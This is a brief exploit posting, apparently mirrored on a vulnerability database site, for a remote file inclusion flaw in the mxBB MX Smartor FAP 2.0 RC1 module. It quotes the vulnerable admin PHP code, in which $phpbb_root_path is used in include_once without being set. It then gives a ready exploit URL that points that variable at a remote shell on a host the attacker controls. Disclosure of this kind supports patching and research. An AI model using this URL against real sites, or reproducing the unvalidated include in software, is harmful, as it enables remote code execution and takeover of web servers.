######################################################################## mxBB Module MX Smartor FAP 2.0 RC1 Remote File Inclusion Vulnerability ######################################################################## Class: Remote Vendor: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=364 Founder: bd0rk Contact: bd0rk[at]hackermail.com Vulnerable Code in /admin/admin_album_otf.php --------------------------------------------------------------------------------------------- define( 'IN_PORTAL', 1 ); if ( !empty( $setmodules ) ) { $file = basename( __FILE__ ); $module['Smartor_Album']['Configuration otf'] = 'modules/mx_smartor/admin/' . $file; return; } $mx_root_path = './../../../'; $module_root_path = "./../"; $phpEx = substr(strrchr(__FILE__, '.'), 1); require( $mx_root_path . '/admin/pagestart.' . $phpEx ); include_once($phpbb_root_path . 'includes/functions_validate.'.$phpEx); --------------------------------------------------------------------------------------------- $phpbb_root_path is not declared before include_once [+]Exploit: http://[target]/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=Shell? Shouts: str0ke, TheJT, Lu7k, GolD_M ;-)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论